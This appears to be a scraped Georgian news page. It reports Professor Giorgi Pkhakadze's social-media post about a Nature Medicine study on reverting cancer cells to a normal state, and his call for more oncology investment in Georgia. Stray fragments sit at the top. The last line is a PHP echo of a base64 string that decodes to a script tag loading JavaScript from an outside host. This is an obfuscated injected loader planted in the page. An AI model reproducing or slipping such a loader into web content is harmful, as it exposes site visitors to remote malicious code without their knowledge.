tube
ავერსი jaluzi

 საზოგადოებრივი ჯანდაცვის ინსტიტუტის (PHIG) თავმჯდომარე, WHO-ს ექსპერტი და გაეროს გენერალური მდივნის ყოფილი მრჩეველი, პროფესორი გიორგი ფხაკაძე სოციალურ ქსელში ახალი სამედიცინო კვლევის შესახებ მნიშვნელოვან ინფორმაციას ავრცელებს. 

მისი თქმით, ახალი კვლევა (https://www.nature.com/articles/s41591-024-03453-1) კიბოს უჯრედების ნორმალურ მდგომარეობაში დაბრუნებას ეხება.
„სამედიცინო გარღვევაა - ახალი სამეცნიერო კვლევა გვიჩვენებს, რომ შესაძლებელია კიბოს უჯრედების ნორმალურ, ჯანმრთელ მდგომარეობაში დაბრუნება! ეს არის რევოლუციური აღმოჩენა, რომელმაც შესაძლოა, სრულიად შეცვალოს კიბოს მკურნალობის თანამედროვე მიდგომები.  ეს კვლევა ახალი იმედია კიბოს წინააღმდეგ ბრძოლაში. კიბო გლობალური გამოწვევაა, თუმცა სამეცნიერო პროგრესს შეუძლია შეცვალოს თამაშის წესები.
საქართველოში საჭიროა მეტი საინვესტიციო რესურსი ონკოლოგიაში, რათა ჩვენმა პაციენტებმა მიიღონ ის მკურნალობა, რომელიც საერთაშორისო დონეზე ხელმისაწვდომია!” - წერს გიორგი ფხაკაძე. 
გიორგი ფხაკაძე აკონკრეტებს იმ მთავარ მიგნებებს, რომელიც ახალი კვლევის საფუძველზე გამოიკვეთა.
Nature Medicine-ის მიერ გამოქვეყნებული კვლევის თანახმად:
• მეცნიერებმა აღმოაჩინეს “მოლეკულური ჩამრთველი”, რომელიც კიბოს უჯრედებს ნორმალურ მდგომარეობაში აბრუნებს.
• განსაკუთრებული წარმატება დაფიქსირდა ფილტვის, მკერდისა და ლაბორატორიულად შექმნილ სიმსივნის მოდელებში.
• “ციფრული ტყუპის” ტექნოლოგიის დახმარებით, გენეტიკური ქსელის სიმულაციით, შესაძლებელი გახდა კიბოს უჯრედების გადაპროგრამება.
• ეს აღმოჩენა შესაძლოა გახდეს ალტერნატივა ქიმიოთერაპიისთვის, რაც ნაკლებად საზიანო იქნება ორგანიზმისთვის.
ფხაკაძე აღნიშნავს, რომ მნიშვნელოვანია, საქართველოს ჯანდაცვის სისტემამ ყურადღება მიაქციოს მსგავს სამეცნიერო მიღწევებს, რათა მოხდეს ინოვაციური მკურნალობის დანერგვა.
„აუცილებელია მეტი საინვესტიციო რესურსი კვლევებში და მკურნალობის თანამედროვე მეთოდების შემოტანაში;
ქიმიოთერაპიის გვერდითი ეფექტების გამო, აუცილებელია ნაკლებად აგრესიული მკურნალობის მეთოდების მხარდაჭერა;
საქართველოს სამედიცინო დაწესებულებებმა უნდა გააძლიერონ საერთაშორისო სამეცნიერო თანამშრომლობა, რათა ქართველ პაციენტებს ჰქონდეთ წვდომა ინოვაციურ თერაპიებზე;“ - წერს გიორგი ფხაკაძე. 
210
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");